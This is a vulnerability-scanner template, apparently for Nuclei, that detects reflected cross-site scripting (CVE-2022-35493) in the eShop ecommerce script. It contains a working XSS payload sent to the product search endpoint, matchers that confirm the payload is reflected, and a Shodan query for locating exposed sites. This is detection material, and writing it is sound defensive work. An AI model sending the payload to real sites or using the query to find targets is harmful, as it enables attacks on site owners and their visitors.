-
Notifications
You must be signed in to change notification settings - Fork 220
/
Copy pathCVE-2022-35493.yaml
35 lines (30 loc) · 1.02 KB
/
CVE-2022-35493.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
id: CVE-2022-35493
info:
name: eShop - Cross-site Scripting
author: arafatansari
severity: medium
description: |
eShop - Multipurpose Ecommerce Store Website v3.0.4 allows Reflected Cross-site scripting vulnerability in json search parse and the json response in wrteam.in.
reference:
- https://github.com/Keyvanhardani/Exploit-eShop-Multipurpose-Ecommerce-Store-Website-3.0.4-Cross-Site-Scripting-XSS/blob/main/README.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-35493
metadata:
verified: true
shodan-query: http.html:"eShop - Multipurpose Ecommerce"
tags: cve,cve2022,eshop,xss
requests:
- method: GET
path:
- '{{BaseURL}}/home/get_products?search=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E'
matchers-condition: and
matchers:
- type: word
words:
- 'Search Result for \"><img src=x onerror=alert(document.domain)>'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200